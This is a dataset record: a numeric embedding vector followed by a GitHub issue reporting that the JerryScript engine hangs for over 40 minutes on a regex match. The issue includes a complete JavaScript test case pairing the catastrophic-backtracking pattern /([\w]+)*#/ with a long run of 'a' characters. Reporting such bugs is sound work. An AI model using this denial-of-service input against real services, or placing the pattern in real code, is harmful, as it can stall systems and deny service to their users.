-0.015309621579945087, 0.02954098768532276, -0.013414748013019562, -0.021327229216694832, 0.007678595371544361, 0.018774304538965225, -0.008951094001531601, 0.010068989358842373, -0.018504740670323372, -0.00719496700912714, -0.004998817108571529, 0.02172364667057991, 0.03412356600165367, 0.022342057898640633, -0.02267504669725895, -0.016459230333566666, 0.006394204683601856, -0.006433846428990364, 0.0002968171611428261, -0.0003191156138200313, -0.004277338273823261, 0.0010168093722313643, 0.004923498257994652, -0.001598551170900464, -0.009870780631899834, -0.02449856512248516, 0.012265139259397984, 0.028288310393691063, 0.008515034802258015, -0.007607240695506334, 0.013089686632156372, 0.0157536081969738, 0.015127269551157951, 0.015206553041934967, 0.000735353387426585, -0.00782130565494299, 0.01794975809752941, 0.0012338475789874792, -0.0020068606827408075, 0.016142096370458603, 0.005212882533669472, 0.00914930272847414, 0.0037045159842818975, -0.011432663537561893, -0.0008691441034898162, 0.0032744037453085184, -0.0008463500998914242, -0.016316520050168037, 0.012376136146485806, 0.009181016124784946, -0.007171181961894035, -0.0026480648666620255, -0.00612464128062129, -0.0075477780774235725, 0.026544075459241867, -0.001703601679764688, 0.00015968168736435473, 0.017807047814130783, 0.0020177620463073254, 0.0032545828726142645, -0.002180292969569564, -0.04325701296329498, -0.021247945725917816, -0.018568167462944984, -0.008435752242803574, 0.00846746563911438, 0.009569504298269749, 0.0016372018726542592, 0.004840250592678785, 0.007999693043529987, 0.0048561072908341885, 0.007789592258632183, 0.003341794479638338, 0.005874898750334978, 0.009759784676134586, 0.01764848083257675, -0.007710308767855167, 0.0059898593463003635, -0.01443750411272049, 0.012360279448330402, 0.01577739231288433, -0.010616044513881207, 0.011932148598134518, -0.020296545699238777, -0.006429882254451513, 0.005977966822683811, -0.0016659420216456056, 0.010711184702813625, -0.022897040471434593, -0.012423706240952015, -0.0011208688374608755, 0.004324908368289471, 0.016617797315120697, -0.005589478649199009, 0.01834617555141449, -0.008197901770472527, 0.0015390886692330241, -0.008729100227355957, 0.0025093189906328917, -0.004491403698921204, 0.011504018679261208, -0.036311790347099304, -0.004439869429916143, 0.01511934120208025, -0.007944194599986076, 0.004316980019211769, -0.009593289345502853, -0.008443680591881275, -0.00651312991976738, -0.007155325263738632, -0.00869738683104515, 0.005823364481329918, 0.015468187630176544, -0.021105235442519188, 0.0028086137026548386, -0.004638077691197395, 0.019028011709451675, 0.014841848984360695, 0.008737028576433659, -0.008602246642112732, 0.0127249825745821, 0.013367177918553352, 0.0024795876815915108, -0.023816728964447975, 0.014754637144505978, -0.019535426050424576, -0.007416960317641497, 0.02751133404672146, -0.0004650465853046626, -0.020042838528752327, -0.011702227406203747, 0.0007472458528354764, 0.0032744037453085184, -0.023071464151144028, 0.003787763649597764, 0.017553340643644333, 0.0342821329832077, 0.010869751684367657, 0.013803237117826939, 0.008253400214016438, -0.000029700298910029233, 0.010227556340396404, -0.009688429534435272, -0.012645699083805084, -0.00005704687282559462, 0.007440745364874601, 0.0317450650036335, 0.01434236392378807, -0.010243413038551807, 0.009593289345502853, -0.02035997249186039, -0.004221840295940638, 0.007710308767855167, 0.02172364667057991, -0.011218599043786526, 0.034250419586896896, -0.010449550114572048, -0.00413462845608592, 0.0064814165234565735, 0.021200375631451607, -0.0009127499652095139, 0.0030385355930775404, -0.014049015007913113, -0.009989705868065357, 0.008435752242803574, 0.0010713166557252407, 0.010037275962531567, 0.010972820222377777, -0.008348540402948856, 0.0071315402165055275, 0.0221834909170866, 0.022564049810171127, 0.00003347864549141377, -0.011067960411310196, -0.021105235442519188, -0.009720142930746078, -0.015055914409458637, -0.000468515238026157, 0.007920409552752972, 0.011773582547903061, 0.018029041588306427, 0.003143586218357086, 0.01078253984451294, -0.00641402555629611, -0.007523993030190468, 0.02454613521695137, -0.004396263509988785, -0.020629536360502243, 0.009910422377288342, -0.0019682098645716906, 0.004642041865736246, 0.006477452348917723, 0.0037302831187844276, 0.016570227220654488, 0.021279659122228622, -0.014167940244078636, 0.0040315599180758, 0.009839068166911602, -0.013898377306759357, -0.006239602342247963, 0.009672572836279869, -0.011543660424649715, 0.012883549556136131, 0.01035440992563963, -0.0022972358856350183, -0.000043079369788756594, -0.0017690104432404041, -0.002681760350242257, -0.006489344872534275, -0.00879252701997757, 0.008380253799259663, 0.029556844383478165, 0.001608461607247591, 0.02549753524363041, 0.014017301611602306, -0.010346481576561928, -0.0008334665326401591, 0.01507177110761404, -0.015579184517264366, 0.023515451699495316, 0.017727764323353767, 0.002346788067370653, -0.01030683983117342, 0.006374383810907602, 0.01804489828646183, 0.007060185074806213, -0.0034706301521509886, 0.0018849624320864677, 0.005938325542956591, 0.008411967195570469, 0.005189097486436367, -0.006818370893597603, 0.02188221365213394, 0.008126546628773212, -0.006723230704665184, -0.013652598485350609, -0.02868472784757614, 0.014302722178399563, 0.030365535989403725, -0.024260714650154114, -0.007785628084093332, 0.002772936364635825, -0.001135734491981566, -0.035106681287288666, -0.007559670601040125, 0.0297312680631876, 0.004895749036222696, 0.009125517681241035, 0.008768741972744465, -0.00758345564827323, 0.021739503368735313, -0.009846996515989304, -0.018520597368478775, -0.01244749128818512, -0.008752885274589062, -0.01302625983953476, 0.009537790901958942, 0.009268227033317089, -0.008530891500413418, 0.010719113051891327, 0.018362032249569893, 0.0003961691400036216, 0.019471999257802963, -0.005977966822683811, 0.0014360202476382256, -0.0021089380607008934, 0.037009481340646744, 0.01126616820693016, 0.012035217136144638, 0.007258393801748753, -0.0023170567583292723, 0.015436474233865738, -0.009672572836279869, -0.006025536917150021, -0.006632055155932903, -0.01199557539075613, 0.0018591952975839376, -0.00719496700912714, 0.04021253064274788, -0.006509165745228529, -0.0014132262440398335, -0.006128605455160141, 0.008879738859832287, -0.022088350728154182, -0.021184518933296204, -0.011052103713154793, 0.016617797315120697, 0.014128298498690128, -0.010322696529328823, -0.01683979108929634, 0.010972820222377777, -0.004392299335449934, -0.0061563546769320965, 0.002531121950596571, 0.0066280909813940525, -0.005137563217431307, -0.029366564005613327, 0.009165159426629543, -0.016395803540945053, 0.043669287115335464, 0.000017745851437211968, 0.035804376006126404, 0.0012546594953164458, -0.006215817295014858, -0.022246917709708214, 0.0011813223827630281, 0.0011496089864522219, -0.026369653642177582, 0.0028700584080070257, 0.015832891687750816, 0.00869738683104515, 0.006786657497286797, -0.0011466359719634056, -0.017426487058401108, 0.01476256549358368, 0.014366148971021175, 0.019218292087316513, 0.007325784303247929, 0.02313489094376564, 0.007829234004020691, 0.014072800055146217, -0.0036589279770851135, -0.02045511268079281, 0.0017680193996056914, -0.024577848613262177, 0.016665367409586906, 0.0014062889385968447, 0.002996911760419607, -0.0041306642815470695, 0.03019111230969429, 0.023547165095806122, 0.004638077691197395, -0.010338553227484226, -0.008475393988192081, -0.016181739047169685, -0.026401367038488388, -0.0007046310347504914, 0.011202742345631123, -0.0005401180242188275, 0.012169999070465565, -0.009054162539541721, 0.015880461782217026, -0.005347664002329111, -0.014944917522370815, -0.0347578339278698, -0.021406512707471848, 0.014897347427904606, -0.013478174805641174, 0.005791651085019112, -0.019471999257802963, -0.024974266067147255, -0.012788409367203712, 0.0034547734539955854, 0.001223937259055674, 0.014675353653728962, -0.0006342670531012118, 0.009157231077551842, -0.008871810510754585, -0.01209864392876625, -0.021136948838829994, 0.003526128362864256, -0.017918044701218605, -0.002792757237330079, 0.003930473700165749, 0.021993210539221764, -0.02035997249186039, -0.0013111489824950695, -0.004217876121401787, 0.0017283777706325054, 0.02186635695397854, 0.010084846056997776, -0.008253400214016438, -0.0013894413132220507, -0.012019360437989235, 0.0014756619930267334, -0.005803543608635664, -0.003197102341800928, -0.017093496397137642, 0.01818760856986046, 0.0017055837670341134, -0.0016758524579927325, 0.01723620668053627, -0.02334102801978588, -0.004757002927362919, 0.01820346526801586, -0.0038392976857721806, 0.00031292159110307693, -0.00612464128062129, -0.024070434272289276, -0.019535426050424576, 0.0027987034991383553, 0.004055344965308905, -0.017458200454711914, 0.013501959852874279, 0.01418379694223404, -0.012804266065359116, -0.022199347615242004, -0.015182767994701862, 0.04037109762430191, 0.015293764881789684, 0.012336494401097298, 0.002802667673677206, 0.02253233641386032, 0.012740839272737503, 0.006980901584029198, -0.020677106454968452, 0.00811068993061781, -0.01779119111597538, -0.009545719251036644, -0.00037411844823509455, -0.002550942823290825, 0.007682559546083212, -0.015047986060380936, 0.017902188003063202, 0.0034765764139592648, -0.01890115812420845, 0.005906612146645784, 0.01779119111597538, 0.006707374006509781, 0.000106475104985293, 0.02359473519027233, 0.006358527112752199, 0.007706344593316317, 0.017902188003063202, 0.007500207982957363, 0.010925250127911568, 0.004860071465373039, 0.012027288787066936, 0.008396110497415066, 0.009466435760259628, -0.026242800056934357, -0.014627784490585327, 0.007393175270408392, -0.01834617555141449, -0.0034547734539955854, -0.0037342472933232784, 0.010893536731600761, 0.0057757943868637085, 0.00012121685722377151, 0.01880601793527603, -0.00025259191170334816, 0.018029041588306427, -0.008633960038423538, 0.020344115793704987, 0.009188943542540073, -0.014064871706068516, -0.011099673807621002, -0.009188943542540073, 0.01063190121203661, 0.0007690488127991557, 0.004110843408852816, -0.0199001282453537, 0.002707527484744787, -0.018568167462944984, -0.0009672572487033904, 0.009632931090891361, -0.0016659420216456056, -0.007738057989627123, -0.0016520675271749496, -0.024815699085593224, -0.003892814042046666, 0.011115530505776405, 0.006913511082530022, 0.021152805536985397, -0.0013418712187558413, 0.0016104436945170164, -0.02035997249186039, -0.013200683519244194, -0.003191156079992652, 0.01308175828307867, 0.012598128989338875, 0.002045511268079281, -0.02822488360106945, 0.00038848858093842864, -0.012883549556136131, -0.0014915185747668147, 0.011321666650474072, -0.0074011036194860935, -0.017933901399374008, 0.007412996143102646, -0.007357497699558735, 0.0014241277240216732, 0.015468187630176544, -0.007559670601040125, 0.0077261654660105705, 0.007052256725728512, -0.004582579713314772, -0.00471339700743556, 0.02954098768532276, -0.00313763995654881, 0.018726734444499016, -0.00719496700912714, -0.011575373820960522, -0.0036252327263355255, 0.008966950699687004, 0.012407849542796612, -0.010362338274717331, -0.001438002334907651, -0.015317548997700214, -0.014897347427904606, 0.0017283777706325054, -0.01607866957783699, -0.009934207424521446, 0.02142236940562725, -0.017093496397137642, -0.009910422377288342, -0.008705315180122852, -0.036565497517585754, 0.010084846056997776, 0.023800872266292572, -0.006199960596859455, 0.017109353095293045, 0.0028343808371573687, 0.027099059894680977, -0.004194091074168682, 0.0021921854931861162, 3.7551211562458775e-7, 0.009640859439969063, -0.00017962641140911728, 0.00879252701997757, 0.016142096370458603, -0.005668761674314737, -0.010901465080678463, 0.0033279198687523603, -0.002772936364635825, 0.008554676547646523, -0.01637994684278965, -0.010481263510882854, 0.031776778399944305, 0.012288924306631088, 0.014944917522370815, -0.004931426607072353, -0.016554370522499084, 0.005200990010052919, 0.013922162353992462, -0.03945141285657883, 0.012542631477117538, -0.01879016123712063, 0.017172779887914658, 0.003660910064354539, 0.012487133033573627, -0.01566639542579651, -0.009038305841386318, -0.006140497978776693, -0.026401367038488388, 0.0038353335112333298, -0.01763262413442135, -0.010449550114572048, -0.006826299242675304, -0.01580117829144001, 0.0016253093490377069, 0.007262357976287603, 0.0037183905951678753, -0.023674018681049347, 0.005296129733324051, 0.02107352390885353, -0.019773274660110474, 0.00386110064573586, 0.008657745085656643, -0.009553647600114346, 0.034694407135248184, -0.008824240416288376, 0.003934437874704599, -0.015365119092166424, 0.007516064681112766, -0.009252370335161686, 0.004840250592678785, -0.01385873556137085, -0.010227556340396404, -0.013065901584923267, -0.005815436132252216, -0.006128605455160141, 0.007543813902884722, 0.0008760813507251441, -0.004657898563891649, -0.00001446302303520497, -0.00005621067975880578, 0.003841279773041606, -0.030571673065423965, 0.020581966266036034, -0.020581966266036034, 0.016871504485607147, 0.020296545699238777, 0.004665826912969351, -0.017854617908596992, -0.01244749128818512, 0.0020108248572796583, 0.003934437874704599, 0.02479984238743782, -0.03210977092385292, -0.005977966822683811, -0.00636249128729105, -0.003647035686299205, 0.005327843129634857, 0.004796644672751427, 0.014374077320098877, -0.000671431131195277, 0.011527803726494312, 0.01156744547188282, 0.00607310701161623, -0.0013735846150666475, -0.021295515820384026, 0.0020019053481519222, -0.004313015844672918, 0.016070742160081863, 0.0005807507550343871, -0.0040038106963038445, -0.018520597368478775, 0.008665673434734344, 0.0010861823102459311, -0.00017268912051804364, 0.013898377306759357, 0.003541985061019659, -0.004067237488925457, 0.005093957297503948, -0.014144155196845531, 0.005093957297503948, 0.004507260397076607, 0.0005470553296618164, 0.0004511720035225153, -0.014025229960680008, 0.0015896317781880498, 0.0007526965928263962, 0.015317548997700214, 0.002251648111268878, -0.007607240695506334, -0.014453360810875893, -0.016570227220654488, 0.013803237117826939, -0.004154449328780174, -0.008522963151335716, 0.01936100237071514, -0.04696747660636902, -0.00859431829303503, 0.012939047999680042, 0.03193534538149834, -0.004301123321056366, -0.0045310454443097115, 0.003613340202718973, 0.0069531528279185295, 0.000883018656168133, -0.014445432461798191, 0.018377887085080147, 0.009569504298269749, 0.012899406254291534, -0.006053286138921976, 0.012582273222506046, -0.0037104622460901737, 0.002885915106162429, 0.022897040471434593, -0.002196149667724967, 0.02378501556813717, -0.0021624541841447353, 0.000526738993357867, 0.035804376006126404, -0.007967979647219181, 0.006053286138921976, 0.001848293817602098, -0.0009969884995371103, -0.018663307651877403, 0.010330624878406525, 0.008189973421394825, -0.0035043254029005766, 0.015888389199972153, -0.0009543737396597862, -0.00841989554464817, -0.01560296956449747, -0.013161041773855686, -0.02172364667057991, -0.0011218598810955882, -0.01204314548522234, -0.013723953627049923, -0.006739087402820587, 0.0010663614375516772, -0.0026421186048537493, -0.0016302645672112703, -0.006322849541902542, 0.0006560700130648911, 0.008356468752026558, -0.0038333514239639044, -0.0053397356532514095, -0.005482445936650038, 0.004412120208144188, -0.015832891687750816, -0.008094833232462406, 0.011155172251164913, -0.012241354212164879, 0.0074328170157969, 0.008871810510754585, 0.0034884687047451735, 0.022040780633687973, -0.004237696994096041, -0.00030375446658581495, -0.008570533245801926, -0.009815283119678497, 0.008031406439840794, 0.0011892507318407297, 0.017172779887914658, 0.0010168093722313643, 0.0050344946794211864, -0.002826452488079667, 0.01688736118376255, -0.01335924956947565, -0.013969731517136097, 0.016395803540945053, 0.009593289345502853, 0.006869905162602663, -0.008522963151335716, -0.021247945725917816, -0.014556429348886013, 0.02212006412446499, 0.0061722113750875, -0.019868414849042892, 0.008951094001531601, 0.013137256726622581, 0.02246890962123871, 0.013525744900107384, 0.02232620120048523, 0.01936100237071514, 0.014382005669176579, -0.0018136074068024755, -0.00040236316272057593, -0.010092774406075478, -0.00011359822383383289, 0.017505770549178123, -0.007738057989627123, 0.010560546070337296, -0.018124181777238846, -0.016823934391140938, -0.016570227220654488, 0.004570687189698219, 0.02399115078151226, -0.014825992286205292, -0.006671696435660124, -0.004860071465373039, -0.0027590617537498474, 0.024371711537241936, -0.0048561072908341885, 0.0013765577459707856, -0.019471999257802963, -0.011638800613582134, -0.0035400029737502337, -0.015618826262652874, 0.018473027274012566, 0.0035736984573304653, -0.006084999535232782, -0.005490374285727739, 0.004602400120347738, -0.011662585660815239, 0.006881797686219215, -0.015047986060380936, -0.014120370149612427, 0.02625865675508976, 0.024324141442775726, 0.011282024905085564, 0.0008027442381717265, -0.039292845875024796, -0.035201821476221085, -0.006810442544519901, -0.027685757726430893, 0.014263080433011055, 0.004285266622900963, 0.014326507225632668, -0.0024141790345311165, 0.0026837424375116825, -0.004285266622900963, -0.002826452488079667, 0.01950371265411377, -0.00024689341080375016, -0.013248253613710403, -0.005026566330343485, -0.014072800055146217, 0.004344729240983725, 0.023198317736387253, -0.007353533525019884, 0.008071048185229301, 0.01996355503797531, -0.009236513637006283, 0.014905275776982307, -0.0057401168160140514, 0.011694299057126045, 0.003607393940910697, -0.007841126061975956, 0.005993823520839214, 0.0234361682087183, 0.005355592351406813, 0.012169999070465565, -0.0014855724293738604, -0.005363520700484514, 0.0073654260486364365, -0.001880998257547617, 0.014786350540816784, -0.001490527531132102, 0.015507829375565052, 0.0060453577898442745, 0.0055062309838831425, -0.01683979108929634, -0.0352969616651535, 0.0020167711190879345, 0.00821375846862793, 0.01718863658607006, 0.0004499331989791244, 0.006683588959276676, 0.03133279085159302, -0.017458200454711914, 0.020423399284482002, -0.002031636657193303, -0.008911452256143093, -0.0070205433294177055, 0.00884802546352148, -0.0009261289960704744, 0.0035855909809470177, 0.003165388945490122, 0.010956963524222374, -0.004158413503319025, 0.0029790729749947786, -0.004221840295940638, -0.012027288787066936, -0.0105843311175704, -0.020883243530988693, 0.006354562938213348, 0.009062090888619423, -0.034250419586896896, -0.003987953998148441, -0.009006592445075512, -0.01985255815088749, 0.020026981830596924, -0.005557765252888203, 0.010727041400969028, -0.011060032062232494, -0.02005869522690773, -0.01628480665385723, -0.01879016123712063, -0.0019364965846762061, 0.008142403326928616, -0.0008290068944916129, 0.013089686632156372, -0.0019919949118047953, 0.017061783000826836, 0.00597003847360611, 0.018837731331586838, 0.014278937131166458, -0.020090408623218536, 0.009934207424521446, 0.007599312346428633, -0.006612234283238649, 0.004261481575667858, -0.0020851530134677887, 0.007575527299195528, 0.025481678545475006, -0.022865327075123787, 0.0033933287486433983, -0.0009806363377720118, -0.010703256353735924, -0.018504740670323372, -0.019725706428289413, 0.017807047814130783, 0.026036662980914116, -0.013692240230739117, 0.004804573021829128, -0.021485796198248863, -0.0050344946794211864, 0.016364090144634247, 0.03685091435909271, 0.031824350357055664, -0.0024776055943220854, -0.02151750959455967, 0.0114643769338727, 0.006148426327854395, -0.014278937131166458, 0.001913702697493136, 0.01859988085925579, 0.005260452628135681, -0.006120677106082439, 0.0036391073372215033, 0.00027377542573958635, 0.010378194972872734, 0.030413106083869934, -0.01890115812420845, -0.024831555783748627, -0.013969731517136097, 0.0028482554480433464, 0.006921439431607723, 0.011012461967766285, 0.015880461782217026, -0.022294487804174423, 0.0064615956507623196, 0.005086028948426247, -0.0012893460225313902, -0.008578461594879627, -0.009886637330055237, 0.005557765252888203, -0.0021882213186472654, -0.0077261654660105705, 0.010616044513881207, -0.0019781203009188175, -0.0022238988894969225, -0.015238266438245773, -0.01728377677500248, 0.0036648742388933897, -0.004340765066444874, -0.017759477719664574, -0.019519569352269173, 0.006025536917150021, -0.01516691129654646, 0.011543660424649715, -0.02519625797867775, 0.022215204313397408, 0.009640859439969063, 0.024419281631708145, -0.015277908183634281, -0.006243566516786814, -0.013192755170166492, 0.00631095701828599, -0.008098797872662544, -0.02359473519027233, 0.01118688564747572, 0.003666856326162815, 0.016601940616965294, -0.0060453577898442745, 0.00328233209438622, 0.012645699083805084, -0.009791498072445393, -0.012169999070465565, -0.0069174752570688725, -0.021913927048444748, 0.006433846428990364, 0.030714381486177444, 0.028446877375245094, 0.004416084382683039, 0.010845966637134552, 0.012598128989338875, -0.016364090144634247, 0.008570533245801926, 0.017807047814130783, 0.0010168093722313643, -0.008657745085656643, 0.002505354816094041, -0.027654044330120087, 0.01471499539911747, -0.003987953998148441, -0.011012461967766285, -0.013168970122933388, -0.014302722178399563, 0.009632931090891361, 0.005696510896086693, 0.008396110497415066, -0.0002556889085099101, 0.01820346526801586, -0.01825103536248207, 0.0272100567817688, 0.015095556154847145, 0.009854924865067005, 0.00009278633660869673, 0.016919074580073357, 0.00010486465907888487, -0.002196149667724967, 0.014802207238972187, 0.022690903395414352, -0.014619856141507626, 0.028795724734663963, 0.015095556154847145, 0.0008369351853616536, -0.020788103342056274, 0.01136130839586258, 0.012613985687494278, -0.017664337530732155, 0.0018463117303326726, 0.01855231076478958, -0.021295515820384026, 0.010211699642241001, 0.000027160753234056756, 0.013581243343651295, -0.01098867692053318, -0.03602636978030205, 0.028446877375245094, 0.008039334788918495, -0.011321666650474072, 0.005082064773887396, 0.01658608391880989, -0.021755360066890717, -0.018377887085080147, 0.008086904883384705, -0.001906765392050147, 0.010996605269610882, -0.006667732261121273, 0.025275541469454765, -0.00952986255288124, 0.020883243530988693, 0.01219378411769867, -0.00821375846862793, 0.01758505403995514, 0.006084999535232782, 0.0007135504274629056, -0.004447797778993845, -0.009157231077551842, 0.0021882213186472654, -0.008737028576433659, 0.00457465136423707, 0.0048917848616838455, 0.013010403141379356, 0.0029651985969394445, -0.0013220503460615873, 0.01598352938890457, 0.020994240418076515, 0.013232396915555, 0.033901575952768326, -0.002144615398719907, 0.018710877746343613, 0.005426947493106127, 0.0037857815623283386, 0.01267741248011589, -0.0038591185584664345, -0.009173087775707245, 0.018504740670323372, 0.01277255266904831, 0.014421647414565086, 0.012534703128039837, 0.0031574605964124203, 0.028399307280778885, -0.013573314994573593, 0.007888696156442165, -0.015476115979254246, -0.01653851382434368, 0.020328259095549583, -0.009688429534435272, 0.025227971374988556, -0.020534396171569824, -0.006195996422320604, 0.010877680033445358, 0.012320637702941895, 0.002432017819955945, -0.007060185074806213, 0.012851836159825325, -0.03266475349664688, -0.010901465080678463, -0.003999846521764994, 0.008966950699687004, -0.003117819083854556, -0.016601940616965294, -0.02248476631939411, -0.01534926239401102, -0.005022602155804634, 0.038785431534051895, -0.0011307792738080025, -0.01718863658607006, -0.012606057338416576, 0.016950787976384163, -0.0007873830618336797, -0.040846798568964005, 0.039641689509153366, 0.0069174752570688725, 0.013224468566477299, 0.011654657311737537, 0.009085875935852528, 0.005648940801620483, 0.011123458854854107, 0.0007135504274629056, 0.00170062854886055, 0.03214148432016373, 0.009125517681241035, -0.01136130839586258, -0.0051613482646644115, 0.004047416616231203, 0.009133446030318737, 0.003972097299993038, 0.005145491566509008, 0.0023031821474432945, -0.010029347613453865, -0.02787603810429573, -0.0025033727288246155, -0.020581966266036034, 0.009514005854725838, 0.023674018681049347, -0.014041086658835411, 0.006168247200548649, -0.005803543608635664, 0.009442650713026524, -0.013438533060252666, -0.019170721992850304, -0.0002742709475569427, -0.001979111460968852, 0.004887820687144995, -0.03653378412127495, -0.018171751871705055, -0.014659496955573559, -0.005498302634805441, -0.011448520235717297, -0.003312063403427601, -0.004217876121401787, 0.003954258747398853, -0.017045926302671432, 0.018282748758792877, -0.030650954693555832, 0.028082173317670822, -0.018584024161100388, 0.007476422935724258, 0.0038848856929689646, 0.0001775204436853528, -0.0105843311175704, 0.023721588775515556, 0.007460566237568855, 0.009022449143230915, 0.003976061474531889, 0.024831555783748627, 0.002281379420310259, 0.01818760856986046, -0.02257990650832653, -0.006116712931543589, -0.012122428975999355, 0.003999846521764994, 0.00972807127982378, 0.01277255266904831, -0.008911452256143093, 0.0024994085542857647, -0.011559517122805119, -0.025132833048701286, 0.010140344500541687, 0.004368514288216829, -0.0027808647137135267, -0.004871963988989592, 0.00044696006807498634, 0.006322849541902542, 0.04141763970255852, -0.005763901863247156, 0.0033854003995656967, 0.012257210910320282, 0.004753038752824068, -0.0050146738067269325, -0.017664337530732155, 0.029747124761343002, 0.0013934054877609015, 0.012391992844641209, 0.003117819083854556, -0.013295822776854038, -0.02827245369553566, -0.01955128274857998, 0.009054162539541721, -0.00006615207530558109, 0.002537068212404847, -0.000066895350755658, 0.01628480665385723, -0.023911867290735245, 0.012645699083805084, -0.002691670786589384, 0.011393021792173386, 0.01549990102648735, -0.01758505403995514, 0.012590201571583748, -0.00597400264814496, 0.00685404846444726, 0.022135920822620392, -0.019519569352269173, -0.0009841049322858453, 0.00100788997951895, -0.007230644579976797, -0.0005772821023128927, -0.005704439245164394, -0.004198055248707533, 0.004626185167580843, -0.025529248639941216, 0.0008924335706979036, -0.0031832277309149504, 0.021358942613005638, 0.016411660239100456, 0.01098867692053318, -0.002491480205208063, 0.0114643769338727, -0.020423399284482002, -0.0022179526276886463, 0.009918350726366043, -0.010639829561114311, -0.01814003847539425, -0.006687553133815527, 0.006965045351535082, 0.004313015844672918, -0.01560296956449747, 0.057084035128355026, 0.010235484689474106, -0.014580214396119118, 0.021136948838829994, -0.008649816736578941, -0.0021485795732587576, 0.01559504121541977, -0.01577739231288433, -0.02070881985127926, 0.000934057345148176, -0.012954904697835445, -0.017616767436265945, 0.038943998515605927, -0.023008037358522415, -0.0029235747642815113, -0.004079130012542009, 0.0013071848079562187, -0.007032435853034258, -0.018219321966171265, -0.008261328563094139, -0.008174116723239422, -0.013692240230739117, 0.024276571348309517, -0.011456448584794998, -0.0005604344187304378, 0.008951094001531601, 0.0017323419451713562, 0.006406097207218409, 0.0013240324333310127, -0.04471582919359207, 0.005319914780557156, 0.014929060824215412, 0.01340681966394186, 0.015856675803661346, 0.006033465266227722, -0.009292012080550194, -0.00010845719225471839, 0.0173789169639349, -0.0019275771919637918, -0.0034052212722599506, -0.0020474933553487062, -0.007036400027573109, -0.0046618627384305, -0.0015410707565024495, 0.00612464128062129, 0.007833197712898254, 0.00593436136841774, 0.0006630072603002191, 0.012923191301524639, 0.026591645553708076, 0.0026441006921231747, 0.018679164350032806, -0.020248975604772568, 0.007377318572252989, -0.004546902142465115, -0.013224468566477299, 0.010401980020105839, 0.006354562938213348, -0.03069852478802204, -0.02433999814093113, 0.017918044701218605, -0.003413149621337652, 0.0021208305843174458, 0.008094833232462406, -0.011813224293291569, 0.008051227778196335, 0.027083203196525574, 0.005466589238494635, -0.02353130839765072, 0.018124181777238846, 0.00802744273096323, -0.0020038874354213476, 0.00018656370230019093, -0.005565693601965904, -0.013478174805641174, -0.012970761395990849, 0.01370809692889452, -0.010972820222377777, 0.004057327285408974, -0.0012467311462387443, 0.009442650713026524, 0.009720142930746078, -0.01141680683940649, -0.00709189847111702, -0.01255055982619524, -0.018774304538965225, -0.0033299019560217857, -0.0002483799762558192, -0.007825270295143127, 0.012907334603369236, 0.02468884550035, 0.002485533943399787, -0.02248476631939411, 0.011456448584794998, 0.0003540498437359929, -0.01068739965558052, -0.011400950141251087, 0.02045511268079281, 0.0004999808152206242, 0.015610897913575172, 0.0038848856929689646, 0.016165882349014282, -0.007504172157496214, -0.004158413503319025, 0.012059002183377743, -0.01961470954120159, -0.02510111965239048, -0.012629842385649681, -0.006061214487999678, 0.0015638647601008415, 0.015817034989595413, 0.02001112513244152, -0.015079699456691742, -0.0058312928304076195, -0.004558794666081667, -0.00204154709354043, -0.002126776846125722, 0.009133446030318737, -0.007523993030190468, 0.0009048216161318123, -0.002166418358683586, -0.00115258211735636, 0.026734355837106705, 0.007313892245292664, 0.00403750641271472, 0.004118771757930517, 0.028415163978934288, 0.011075888760387897, -0.013248253613710403, 0.01522240974009037, 0.0032862962689250708, -0.010758754797279835, -0.008610174991190434, 0.029366564005613327, 0.01809246838092804, 0.019868414849042892, -0.013684311881661415, 0.027812611311674118, 0.012851836159825325, -0.0007373354746960104, -0.009712214581668377, 0.04772859439253807, -0.0032248515635728836, 0.004503296222537756, -0.0035499134100973606, -0.0019107295665889978, -0.020296545699238777, -0.008253400214016438, 0.008435752242803574, -0.008863882161676884, 0.013256181962788105, 0.0014449396403506398, 0.004368514288216829, -0.0031098907347768545, -0.0010495138121768832, 0.012915262952446938, 0.02066124975681305, 0.022135920822620392, -0.013065901584923267, 0.024482708424329758, -0.005363520700484514, -0.006727194879204035, -0.012883549556136131, 0.0123523510992527, 0.020296545699238777, -0.008055191487073898, 0.0027293304447084665, -0.02047096937894821, -0.02334102801978588, -0.006612234283238649, -0.02500597946345806, -0.0065170940943062305, 0.012590201571583748, -0.007468494586646557, 0.026369653642177582, 0.0013190772151574492, -0.004122735932469368, 0.013184826821088791, -0.0018254999304190278, 0.014944917522370815, 0.014469217509031296, 0.005082064773887396, -0.018837731331586838, 0.005411090794950724, 0.0173789169639349, 0.00868945848196745, -0.019820844754576683, -0.010901465080678463, -0.006342670414596796, 0.01683979108929634, 0.009648787789046764, -0.004935390315949917, 0.015951815992593765, -0.011789439246058464, 0.007849054411053658, 0.01623723655939102, 0.005244595929980278, -0.007068113423883915, 0.016697080805897713, -0.0037560502532869577, -0.011044175364077091, -0.01219378411769867, -0.024720558896660805, 0.02843102067708969 ]
1,769
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
When the regular expression matching operation is performed using regular expression parameter `/([\w]+)*#/` and string parameter `aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa`, the execution time exceeds 40 minutes when the following test case is executed. And when I use PHP language to match with the same parameters, I do not find any timeout. Is this an issue of jerry? #### version ``` e8ed543 ``` #### command ``` jerryscript/build/bin/jerry testcase.js ``` #### testcase ```javascript var matchTest = function(regex, testString){ result = String.prototype.match.call(testString, regex); if (result !== null){ return result[0]; } else return ""; }; var regex = /([\w]+)*#/; var testString ="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; var result = matchTest(regex, testString); print(result); ```
A question about RegExp timeout
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4683/comments
3
2021-06-04T09:40:22
2021-12-08T14:37:15Z
https://github.com/jerryscript-project/jerryscript/issues/4683
911,321,218
4,683
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : A question about RegExp timeout Issue date: --- start body --- When the regular expression matching operation is performed using regular expression parameter `/([\w]+)*#/` and string parameter `aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa`, the execution time exceeds 40 minutes when the following test case is executed. And when I use PHP language to match with the same parameters, I do not find any timeout. Is this an issue of jerry? #### version ``` e8ed543 ``` #### command ``` jerryscript/build/bin/jerry testcase.js ``` #### testcase ```javascript var matchTest = function(regex, testString){ result = String.prototype.match.call(testString, regex); if (result !== null){ return result[0]; } else return ""; }; var regex = /([\w]+)*#/; var testString ="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; var result = matchTest(regex, testString); print(result); ``` --- end body ---
1,030
